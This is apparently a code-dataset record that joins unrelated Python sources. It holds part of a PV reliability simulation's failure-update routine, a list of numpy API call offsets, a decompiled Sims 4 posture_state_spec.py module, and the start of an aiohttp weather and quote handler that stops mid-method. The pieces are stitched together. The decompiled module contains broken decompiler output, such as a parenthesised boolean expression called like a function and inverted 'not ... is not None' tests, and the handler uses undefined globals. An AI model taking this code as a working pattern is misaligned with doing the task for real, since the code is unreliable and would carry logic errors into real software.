failed_comps.loc[warranty_mask, "cumulative_oow_failures"] += 1
failed_comps["state"] = 0
# update time to detection times for component levels with only static monitoring
# which will have None for monitor times
try:
if failed_comps["monitor_times"].isnull().any():
# monitor and time to detection will be the time to next static monitoring
indep_monitors = list(self.case.config[self.level][ck.INDEP_MONITOR].keys())
# next static monitoring is the min of the possible static monitors for this component level
failed_comps["monitor_times"] = np.amin(self.indep_monitoring.indep_monitoring[indep_monitors])
# in order to calculate the time to detection for component levels only monitoring by an
# independment monitoring with a threshold (no interval), need to instead
# set the nans that will be there to the day in the simulation when these components failed
# so it can be calculated later
failed_comps["monitor_times"] = failed_comps["monitor_times"].fillna(day)
failed_comps["time_to_detection"] = None # failed_comps["monitor_times"].copy()
# fails if no monitoring defined, faster then just doing a check if the column exists or whatever
except KeyError:
pass
df.loc[mask] = failed_comps
else:
# check to see when last failure was for fraction failure, and update components with new failures
# if its been longer then the mean time of the distribution
# this is so if repairs arent occuring due to poor monitoring, failures are still occuring
fail = self.case.config[self.level][ck.PARTIAL_FAIL][self.mode]
if fail.get(ck.FRAC, None):
# extract mean, since some distributions might not have mean defined in params
if not self.mean:
self.mean = sample(fail[ck.DIST], fail[ck.PARAM], 10000).mean()
if day > (self.mean + self.last_failure_day):
# fail new fraction of components
counts = self.df[f"time_to_failure_{self.mode}"].isna()
update_df = self.df.loc[counts].copy()
sample_ = np.random.random_sample(size=len(update_df))
# we just want the difference in fractions to bump it up to the failure fraction
defective = sample_ < fail[ck.FRAC]
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], len(update_df))
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
failure_times = np.where(
list(defective),
sample_,
np.nan,
)
update_df[f"time_to_failure_{self.mode}"] = failure_times
self.df.loc[counts] = update_df
self.last_failure_day = day
| [
"numpy.random.random_sample",
"numpy.amin",
"pvrpm.core.utils.sample",
"numpy.array",
"numpy.zeros",
"numpy.finfo",
"numpy.argmin"
] | [((4175, 4216), 'numpy.argmin', 'np.argmin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (4184, 4216), True, 'import numpy as np\n'), ((4249, 4288), 'numpy.amin', 'np.amin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (4256, 4288), True, 'import numpy as np\n'), ((5894, 5935), 'numpy.argmin', 'np.argmin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (5903, 5935), True, 'import numpy as np\n'), ((5968, 6007), 'numpy.amin', 'np.amin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (5975, 6007), True, 'import numpy as np\n'), ((4102, 4151), 'numpy.zeros', 'np.zeros', (['(self.case.config[ck.LIFETIME_YRS] * 365)'], {}), '(self.case.config[ck.LIFETIME_YRS] * 365)\n', (4110, 4151), True, 'import numpy as np\n'), ((7981, 8022), 'numpy.argmin', 'np.argmin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (7990, 8022), True, 'import numpy as np\n'), ((8333, 8372), 'numpy.amin', 'np.amin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (8340, 8372), True, 'import numpy as np\n'), ((15496, 15558), 'numpy.random.random_sample', 'np.random.random_sample', ([], {'size': 'component_info[ck.NUM_COMPONENT]'}), '(size=component_info[ck.NUM_COMPONENT])\n', (15519, 15558), True, 'import numpy as np\n'), ((15621, 15692), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'component_info[ck.NUM_COMPONENT]'], {}), '(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])\n', (15627, 15692), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((16004, 16075), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'component_info[ck.NUM_COMPONENT]'], {}), '(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])\n', (16010, 16075), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((16177, 16226), 'numpy.zeros', 'np.zeros', (['(self.case.config[ck.LIFETIME_YRS] * 365)'], {}), '(self.case.config[ck.LIFETIME_YRS] * 365)\n', (16185, 16226), True, 'import numpy as np\n'), ((16914, 16956), 'numpy.random.random_sample', 'np.random.random_sample', ([], {'size': 'num_repaired'}), '(size=num_repaired)\n', (16937, 16956), True, 'import numpy as np\n'), ((17019, 17070), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'num_repaired'], {}), '(fail[ck.DIST], fail[ck.PARAM], num_repaired)\n', (17025, 17070), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((17373, 17424), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'num_repaired'], {}), '(fail[ck.DIST], fail[ck.PARAM], num_repaired)\n', (17379, 17424), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((3343, 3405), 'numpy.random.random_sample', 'np.random.random_sample', ([], {'size': 'component_info[ck.NUM_COMPONENT]'}), '(size=component_info[ck.NUM_COMPONENT])\n', (3366, 3405), True, 'import numpy as np\n'), ((3476, 3547), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'component_info[ck.NUM_COMPONENT]'], {}), '(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])\n', (3482, 3547), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((3927, 3998), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'component_info[ck.NUM_COMPONENT]'], {}), '(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])\n', (3933, 3998), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((5196, 5238), 'numpy.random.random_sample', 'np.random.random_sample', ([], {'size': 'num_repaired'}), '(size=num_repaired)\n', (5219, 5238), True, 'import numpy as np\n'), ((5309, 5360), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'num_repaired'], {}), '(fail[ck.DIST], fail[ck.PARAM], num_repaired)\n', (5315, 5360), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((5819, 5870), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'num_repaired'], {}), '(fail[ck.DIST], fail[ck.PARAM], num_repaired)\n', (5825, 5870), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((13424, 13465), 'numpy.argmin', 'np.argmin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (13433, 13465), True, 'import numpy as np\n'), ((13804, 13843), 'numpy.amin', 'np.amin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (13811, 13843), True, 'import numpy as np\n'), ((6722, 6742), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (6730, 6742), True, 'import numpy as np\n'), ((8411, 8426), 'numpy.array', 'np.array', (['types'], {}), '(types)\n', (8419, 8426), True, 'import numpy as np\n'), ((10172, 10235), 'numpy.amin', 'np.amin', (['self.indep_monitoring.indep_monitoring[indep_monitors]'], {}), '(self.indep_monitoring.indep_monitoring[indep_monitors])\n', (10179, 10235), True, 'import numpy as np\n'), ((20340, 20403), 'numpy.amin', 'np.amin', (['self.indep_monitoring.indep_monitoring[indep_monitors]'], {}), '(self.indep_monitoring.indep_monitoring[indep_monitors])\n', (20347, 20403), True, 'import numpy as np\n'), ((3778, 3798), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (3786, 3798), True, 'import numpy as np\n'), ((5652, 5672), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (5660, 5672), True, 'import numpy as np\n'), ((7839, 7859), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (7847, 7859), True, 'import numpy as np\n'), ((12393, 12413), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (12401, 12413), True, 'import numpy as np\n'), ((13886, 13901), 'numpy.array', 'np.array', (['types'], {}), '(types)\n', (13894, 13901), True, 'import numpy as np\n'), ((13270, 13290), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (13278, 13290), True, 'import numpy as np\n'), ((21744, 21788), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', '(10000)'], {}), '(fail[ck.DIST], fail[ck.PARAM], 10000)\n', (21750, 21788), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((11763, 11807), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', '(10000)'], {}), '(fail[ck.DIST], fail[ck.PARAM], 10000)\n', (11769, 11807), False, 'from pvrpm.core.utils import sample, get_higher_components\n')] |
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\postures\posture_state_spec.py
# Compiled at: 2020-04-15 01:17:36
# Size of source mod 2**32: 27750 bytes
from collections import namedtuple
from timeit import itertools
import functools
from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR
from objects.components.types import CARRYABLE_COMPONENT
from objects.definition import Definition
from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match
from sims4.collections import frozendict
import services
ANIMATION_PARTICIPANT_TO_POSTURE_SPEC_VARIABLE_MAP = {AnimationParticipant.CONTAINER: PostureSpecVariable.INTERACTION_TARGET,
AnimationParticipant.TARGET: PostureSpecVariable.INTERACTION_TARGET}
POSTURE_SPEC_MANIFEST_INDEX = 0
POSTURE_SPEC_SLOT_MANIFEST_INDEX = 1
POSTURE_SPEC_BODY_TARGET_INDEX = 2
_PostureStateSpec = namedtuple('_PostureStateSpec', ('posture_manifest', 'slot_manifest',
'body_target'))
class PostureStateSpec(_PostureStateSpec):
__slots__ = ()
def __new__(cls, posture_manifest, slot_manifest, body_target):
posture_manifest = posture_manifest.get_constraint_version().frozen_copy()
return _PostureStateSpec.__new__(cls, posture_manifest, slot_manifest.frozen_copy(), body_target)
def __str__(self):
items = ', '.join((str(i) for i in self))
return '[' + items + ']'
def get_concrete_version(self, target_resolver, posture_state=None):
posture_manifest = self.posture_manifest.apply_actor_map(target_resolver)
slot_manifest = self.slot_manifest.apply_actor_map(target_resolver)
if not posture_state is not None or self.body_target is PostureSpecVariable.ANYTHING or self.body_target is PostureSpecVariable.BODY_TARGET_FILTERED:
if posture_state.body.target is not None:
body_target = posture_state.body.target
else:
body_target = target_resolver(self.body_target, self.body_target)
if posture_manifest:
posture_types = []
for posture_manifest_entry in posture_manifest:
if posture_manifest_entry.posture_type_specific:
is_specific = True
posture_type = posture_manifest_entry.posture_type_specific
posture_types.append((posture_type, is_specific))
else:
if posture_manifest_entry.posture_type_family:
is_specific = False
posture_type = posture_manifest_entry.posture_type_family
posture_types.append((posture_type, is_specific))
surface_target = posture_manifest_entry.surface_target
allow_surface = posture_manifest_entry.allow_surface
if allow_surface:
if slot_manifest:
for slot_manifest_entry in slot_manifest:
if isinstance(slot_manifest_entry.actor, str):
continue
slotted_object = slot_manifest_entry.actor
break
else:
slotted_object = None
if slotted_object is not None and slotted_object.definition is not slotted_object and slotted_object.carryable_component is None:
surface_target = None
slotted_object_or_parent = slotted_object
while slotted_object_or_parent is not None:
if slotted_object_or_parent.is_surface(include_parts=True, ignore_deco_slots=True):
surface_target = slotted_object_or_parent
break
slotted_object_or_parent = slotted_object_or_parent.parent
if surface_target is not None:
def get_surface(participant, default):
if participant in (AnimationParticipant.SURFACE, PostureSpecVariable.SURFACE_TARGET):
return surface_target
return default
posture_manifest = posture_manifest.apply_actor_map(get_surface)
slot_manifest = slot_manifest.apply_actor_map(get_surface)
if slot_manifest and surface_target is not None:
if not isinstance(surface_target, (AnimationParticipant, PostureSpecVariable, str)):
slot_manifest = slot_manifest.apply_actor_map({PostureSpecVariable.ANYTHING: surface_target}.get)
if body_target == PostureSpecVariable.ANYTHING and posture_types:
if surface_target is not None:
if not isinstance(surface_target, (AnimationParticipant, PostureSpecVariable, str)):
if all((posture_type.mobile for posture_type, _ in posture_types)):
body_target = surface_target
else:
for child in surface_target.children:
if child.parent is not surface_target:
continue
if all((child.supports_posture_type(posture_type, is_specific=is_specific) for posture_type, is_specific in posture_types)):
body_target = child
break
else:
if all((surface_target.supports_posture_type(posture_type, is_specific=is_specific) for posture_type, is_specific in posture_types)):
body_target = surface_target
else:
if (isinstance(body_target, (AnimationParticipant, PostureSpecVariable, str)) or surface_target is None or isinstance)(surface_target, (AnimationParticipant, PostureSpecVariable, str)):
surface_target = None
body_target_or_parent = body_target
while body_target_or_parent is not None:
if body_target_or_parent.is_surface(include_parts=True, ignore_deco_slots=True):
surface_target = body_target_or_parent
break
body_target_or_parent = body_target_or_parent.parent
if surface_target is not None:
def get_surface(participant, default):
if participant in (AnimationParticipant.SURFACE, PostureSpecVariable.SURFACE_TARGET):
return surface_target
return default
posture_manifest = posture_manifest.apply_actor_map(get_surface)
slot_manifest = slot_manifest.apply_actor_map(get_surface)
return PostureStateSpec(posture_manifest, slot_manifest, body_target)
def get_holster_version(self):
return PostureStateSpec(self.posture_manifest.get_holster_version(), self.slot_manifest, self.body_target)
def get_posture_specs_gen(self, interaction=None):
for posture_manifest_entry in self.posture_manifest:
var_map = {}
hand, carry_target = posture_manifest_entry.carry_hand_and_target
if hand is not None:
allowed_hands = None
if posture_manifest_entry.actor in _NOT_SPECIFIC_ACTOR:
carry_actor = interaction.sim if interaction is not None else None
else:
carry_actor = posture_manifest_entry.actor
if isinstance(carry_target, (str, Definition)) or carry_target == AnimationParticipant.CREATE_TARGET:
carry = PostureAspectCarry((PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, None, PostureSpecVariable.HAND))
if isinstance(carry_target, Definition):
allowed_hands = carry_target.get_allowed_hands(carry_actor)
else:
carry = PostureAspectCarry((PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT, PostureSpecVariable.CARRY_TARGET, PostureSpecVariable.HAND))
if hasattr(carry_target, 'manager'):
allowed_hands = carry_target.get_allowed_hands(carry_actor)
var_map[PostureSpecVariable.CARRY_TARGET] = carry_target
elif allowed_hands is not None and hand not in allowed_hands:
continue
var_map[PostureSpecVariable.HAND] = hand
else:
carry = None
surface_target = posture_manifest_entry.surface_target
if surface_target is not None:
if isinstance(surface_target, (str, AnimationParticipant)):
surface_target = ANIMATION_PARTICIPANT_TO_POSTURE_SPEC_VARIABLE_MAP.get(surface_target, PostureSpecVariable.SURFACE_TARGET)
elif posture_manifest_entry.allow_surface:
surface_target = PostureSpecVariable.ANYTHING
else:
surface_target = None
carryable_surfaces = []
other_surfaces = []
for slot_manifest_entry in self.slot_manifest:
slot_var_map = {}
slot_var_map[PostureSpecVariable.SLOT] = slot_manifest_entry
slot_type = PostureSpecVariable.SLOT
slot_child = slot_manifest_entry.actor
slot_parent = slot_manifest_entry.target
slot_child_is_carryable = False
slot_target = None
if isinstance(slot_child, str):
slot_target = None
else:
if isinstance(slot_child, Definition) or slot_child == AnimationParticipant.CREATE_TARGET:
slot_target = None
slot_var_map[PostureSpecVariable.SLOT_TEST_DEFINITION] = slot_child
if hasattr(slot_child, 'manager'):
included_sis = []
if interaction is not None:
if interaction.transition is not None:
included_sis = interaction.transition.get_included_sis().union((interaction,))
else:
included_sis = (
interaction,)
slot_child_is_carryable = True if slot_child.has_component(CARRYABLE_COMPONENT) else False
if slot_child_is_carryable:
if any((included_si.carry_target is slot_child for included_si in included_sis)):
slot_var_map[PostureSpecVariable.CARRY_TARGET] = slot_child
slot_target = ANIMATION_PARTICIPANT_TO_POSTURE_SPEC_VARIABLE_MAP.get(slot_child, PostureSpecVariable.CARRY_TARGET)
else:
if any((included_si.target is slot_child for included_si in included_sis)):
slot_var_map[PostureSpecVariable.SLOT_TARGET] = slot_child
slot_target = ANIMATION_PARTICIPANT_TO_POSTURE_SPEC_VARIABLE_MAP.get(slot_child, PostureSpecVariable.SLOT_TARGET)
else:
logger.error("Interaction {} has a slot_manifest_entry {} with a slot_child {} that doesn't appear to be a carry target or an interaction target. Please grab <NAME> and show this to him.", interaction,
slot_manifest_entry, slot_child, owner='tastle')
else:
variables_match(surface_target, slot_parent) or logger.error("One of the slotting requirements for this posture_state_spec has a target different from the posture manifest's surface target. This probably won't work: {} vs {} in {}", surface_target, slot_parent, posture_manifest_entry, owner='jpollak')
surface = PostureAspectSurface((slot_parent, slot_type, slot_target))
if slot_child_is_carryable:
carryable_surfaces.append((surface, slot_var_map))
else:
other_surfaces.append((surface, slot_var_map))
surface = None
first_list_with_surfaces = carryable_surfaces or other_surfaces
if first_list_with_surfaces:
surface, slot_var_map = first_list_with_surfaces.pop()
if carryable_surfaces:
logger.error('Multiple slot requirements for carryable targets, arbitrarily choosing one to manipulate in transition: {}', posture_manifest_entry, owner='jpollak')
other_surfaces.extend(carryable_surfaces)
var_map.update(slot_var_map)
if other_surfaces:
var_map[PostureSpecVariable.DESTINATION_FILTER] = functools.partial(self._destination_filter, other_surfaces)
elif surface_target == PostureSpecVariable.ANYTHING:
surface = None
else:
if surface_target == None:
surface = PostureAspectSurface((None, None, None))
else:
surface = PostureAspectSurface((surface_target, None, None))
if not posture_manifest_entry.posture_types:
spec = PostureSpec((None, carry, surface))
yield (spec, frozendict(var_map))
continue
if posture_manifest_entry.specific:
posture_types = posture_manifest_entry.posture_types
else:
if posture_manifest_entry.family:
posture_types = [posture_type for posture_type in services.posture_manager().types.values() if posture_type.family_name == posture_manifest_entry.family]
else:
logger.error('Posture manifest entry has neither specific nor family.', owner='bhill')
continue
for posture_type in posture_types:
target_object_filters = [x.target_object_filter for x in self.posture_manifest if x.target_object_filter is not MATCH_ANY]
if target_object_filters:
body = PostureAspectBody((posture_type, PostureSpecVariable.BODY_TARGET_FILTERED))
var_map[PostureSpecVariable.BODY_TARGET_FILTERED] = tuple(target_object_filters)
else:
body = PostureAspectBody((posture_type, self.body_target))
spec = PostureSpec((body, carry, surface))
yield (spec, frozendict(var_map))
@staticmethod
def _destination_filter(surfaces_and_var_maps, dest_spec, var_map):
for surface, slot_var_map in surfaces_and_var_maps:
combo_var_map = frozendict(var_map, slot_var_map)
if PostureSpecVariable.SURFACE_TARGET in combo_var_map:
surface = combo_var_map[PostureSpecVariable.SURFACE_TARGET]
else:
slot_child = combo_var_map[PostureSpecVariable.CARRY_TARGET]
surface = slot_child.parent
op = PostureOperation.TargetAlreadyInSlot(PostureSpecVariable.CARRY_TARGET, surface, PostureSpecVariable.SLOT)
if not op.validate(None, None, combo_var_map):
return False
return True
@property
def supported_postures(self):
return self.posture_manifest
@staticmethod
def _intersect_attr(this_constraint, other_constraint, attr_name, resolve_fn):
value0 = getattr(this_constraint, attr_name)
value1 = getattr(other_constraint, attr_name)
if value0 is not None:
if value1 is not None:
if value0 != value1:
return resolve_fn(value0, value1)
return (
None, value0)
return (None, value1)
@staticmethod
def _intersect_attr_len(this_constraint, other_constraint, attr_name, resolve_fn):
value0 = getattr(this_constraint, attr_name)
value1 = getattr(other_constraint, attr_name)
if value0:
if value1:
if value0 != value1:
return resolve_fn(value0, value1)
return (
None, value0)
return (None, value1)
def intersection(self, other):
early_out, posture_manifest = self._intersect_attr_len(self, other, 'posture_manifest', self._resolve_unequal_manifest)
if early_out is not None:
return early_out
early_out, slot_manifest = self._intersect_attr_len(self, other, 'slot_manifest', self._resolve_unequal_manifest)
if early_out is not None:
return early_out
early_out, body_target = self._intersect_attr(self, other, 'body_target', resolve_variables_and_objects)
if early_out is not None:
return early_out
return PostureStateSpec(posture_manifest, slot_manifest, body_target)
def _resolve_unequal_manifest(self, value0, value1):
result = value0.intersection(value1)
if result is not None:
return (
None, result)
return (False, None)
def references_object(self, obj):
posture_manifest, slot_manifest, body_target = self
for posture_manifest_entry in posture_manifest:
if posture_manifest_entry.references_object(obj):
return True
for slot_manifest_entry in slot_manifest:
if slot_manifest_entry.references_object(obj):
return True
if body_target is obj:
return True
return False
def is_filtered_target(self):
posture_manifest, *_ = self
for posture_manifest_entry in posture_manifest:
if posture_manifest_entry.target_object_filter is not MATCH_ANY:
return True
return False
def is_vehicle_only_spec(self):
if not self.posture_manifest:
return False
for posture_manifest_entry in self.posture_manifest:
for posture in posture_manifest_entry.posture_types:
if not posture.is_vehicle:
return False
return True
def create_body_posture_state_spec(posture_manifest, body_target=PostureSpecVariable.ANYTHING):
return PostureStateSpec(posture_manifest, SlotManifest().intern(), body_target) | [
"postures.posture_specs.variables_match",
"postures.posture_specs.PostureSpec",
"collections.namedtuple",
"postures.posture_specs.PostureAspectBody",
"animation.posture_manifest.logger.error",
"sims4.collections.frozendict",
"postures.posture_specs.PostureOperation.TargetAlreadyInSlot",
"postures.post... | [((1193, 1282), 'collections.namedtuple', 'namedtuple', (['"""_PostureStateSpec"""', "('posture_manifest', 'slot_manifest', 'body_target')"], {}), "('_PostureStateSpec', ('posture_manifest', 'slot_manifest',\n 'body_target'))\n", (1203, 1282), False, 'from collections import namedtuple\n'), ((15391, 15424), 'sims4.collections.frozendict', 'frozendict', (['var_map', 'slot_var_map'], {}), '(var_map, slot_var_map)\n', (15401, 15424), False, 'from sims4.collections import frozendict\n'), ((15725, 15834), 'postures.posture_specs.PostureOperation.TargetAlreadyInSlot', 'PostureOperation.TargetAlreadyInSlot', (['PostureSpecVariable.CARRY_TARGET', 'surface', 'PostureSpecVariable.SLOT'], {}), '(PostureSpecVariable.CARRY_TARGET,\n surface, PostureSpecVariable.SLOT)\n', (15761, 15834), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((13942, 13977), 'postures.posture_specs.PostureSpec', 'PostureSpec', (['(None, carry, surface)'], {}), '((None, carry, surface))\n', (13953, 13977), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((15126, 15161), 'postures.posture_specs.PostureSpec', 'PostureSpec', (['(body, carry, surface)'], {}), '((body, carry, surface))\n', (15137, 15161), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((18952, 18966), 'animation.posture_manifest.SlotManifest', 'SlotManifest', ([], {}), '()\n', (18964, 18966), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((8028, 8132), 'postures.posture_specs.PostureAspectCarry', 'PostureAspectCarry', (['(PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, None, PostureSpecVariable.HAND\n )'], {}), '((PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, None,\n PostureSpecVariable.HAND))\n', (8046, 8132), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((14454, 14544), 'animation.posture_manifest.logger.error', 'logger.error', (['"""Posture manifest entry has neither specific nor family."""'], {'owner': '"""bhill"""'}), "('Posture manifest entry has neither specific nor family.',\n owner='bhill')\n", (14466, 14544), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((14825, 14900), 'postures.posture_specs.PostureAspectBody', 'PostureAspectBody', (['(posture_type, PostureSpecVariable.BODY_TARGET_FILTERED)'], {}), '((posture_type, PostureSpecVariable.BODY_TARGET_FILTERED))\n', (14842, 14900), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((15051, 15102), 'postures.posture_specs.PostureAspectBody', 'PostureAspectBody', (['(posture_type, self.body_target)'], {}), '((posture_type, self.body_target))\n', (15068, 15102), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((8332, 8463), 'postures.posture_specs.PostureAspectCarry', 'PostureAspectCarry', (['(PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT, PostureSpecVariable.\n CARRY_TARGET, PostureSpecVariable.HAND)'], {}), '((PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT,\n PostureSpecVariable.CARRY_TARGET, PostureSpecVariable.HAND))\n', (8350, 8463), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((12492, 12551), 'postures.posture_specs.PostureAspectSurface', 'PostureAspectSurface', (['(slot_parent, slot_type, slot_target)'], {}), '((slot_parent, slot_type, slot_target))\n', (12512, 12551), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((13079, 13252), 'animation.posture_manifest.logger.error', 'logger.error', (['"""Multiple slot requirements for carryable targets, arbitrarily choosing one to manipulate in transition: {}"""', 'posture_manifest_entry'], {'owner': '"""jpollak"""'}), "(\n 'Multiple slot requirements for carryable targets, arbitrarily choosing one to manipulate in transition: {}'\n , posture_manifest_entry, owner='jpollak')\n", (13091, 13252), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((13471, 13530), 'functools.partial', 'functools.partial', (['self._destination_filter', 'other_surfaces'], {}), '(self._destination_filter, other_surfaces)\n', (13488, 13530), False, 'import functools\n'), ((13718, 13758), 'postures.posture_specs.PostureAspectSurface', 'PostureAspectSurface', (['(None, None, None)'], {}), '((None, None, None))\n', (13738, 13758), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((13811, 13861), 'postures.posture_specs.PostureAspectSurface', 'PostureAspectSurface', (['(surface_target, None, None)'], {}), '((surface_target, None, None))\n', (13831, 13861), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((14007, 14026), 'sims4.collections.frozendict', 'frozendict', (['var_map'], {}), '(var_map)\n', (14017, 14026), False, 'from sims4.collections import frozendict\n'), ((15191, 15210), 'sims4.collections.frozendict', 'frozendict', (['var_map'], {}), '(var_map)\n', (15201, 15210), False, 'from sims4.collections import frozendict\n'), ((12154, 12198), 'postures.posture_specs.variables_match', 'variables_match', (['surface_target', 'slot_parent'], {}), '(surface_target, slot_parent)\n', (12169, 12198), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((12202, 12467), 'animation.posture_manifest.logger.error', 'logger.error', (['"""One of the slotting requirements for this posture_state_spec has a target different from the posture manifest\'s surface target. This probably won\'t work: {} vs {} in {}"""', 'surface_target', 'slot_parent', 'posture_manifest_entry'], {'owner': '"""jpollak"""'}), '(\n "One of the slotting requirements for this posture_state_spec has a target different from the posture manifest\'s surface target. This probably won\'t work: {} vs {} in {}"\n , surface_target, slot_parent, posture_manifest_entry, owner=\'jpollak\')\n', (12214, 12467), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((11807, 12067), 'animation.posture_manifest.logger.error', 'logger.error', (['"""Interaction {} has a slot_manifest_entry {} with a slot_child {} that doesn\'t appear to be a carry target or an interaction target. Please grab <NAME> and show this to him."""', 'interaction', 'slot_manifest_entry', 'slot_child'], {'owner': '"""tastle"""'}), '(\n "Interaction {} has a slot_manifest_entry {} with a slot_child {} that doesn\'t appear to be a carry target or an interaction target. Please grab <NAME> and show this to him."\n , interaction, slot_manifest_entry, slot_child, owner=\'tastle\')\n', (11819, 12067), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((14308, 14334), 'services.posture_manager', 'services.posture_manager', ([], {}), '()\n', (14332, 14334), False, 'import services\n')] |
from aiohttp import web
import json
from weather_connector import WeatherConnector
from essentialdb import EssentialDB
import random
import jinja2
import aiohttp_jinja2
import os
import datetime
class MMRequestHandler:
def __init__(self, db_path):
self.db_path = db_path
self._init_db()
def _init_db(self):
#first, see if already exists
if not os.path.isfile(self.db_path):
print("creating db...")
from quotes import initial_quotes
with EssentialDB(filepath=self.db_path) as db:
db.set("quotes", initial_quotes)
@aiohttp_jinja2.template('weather.html')
async def weather(self, request):
with EssentialDB(filepath=self.db_path) as db:
weather = db.get("weather")
do_update = False
try:
delta = datetime.datetime.now() - weather["updated"]
if delta > datetime.timedelta(minutes=mm_config["weather"]["update_minutes"]):
do_update = True
except:
# probably not an error - just no weather update yet.
do_update = True
pass
if do_update:
new_weather = weather_connector.get_weather()
db.set("weather", new_weather)
weather = new_weather
return {'weather': weather}
@aiohttp_jinja2.template('quote.html')
async def quote(self, request):
with EssentialDB(filepath=self.db_path) as db:
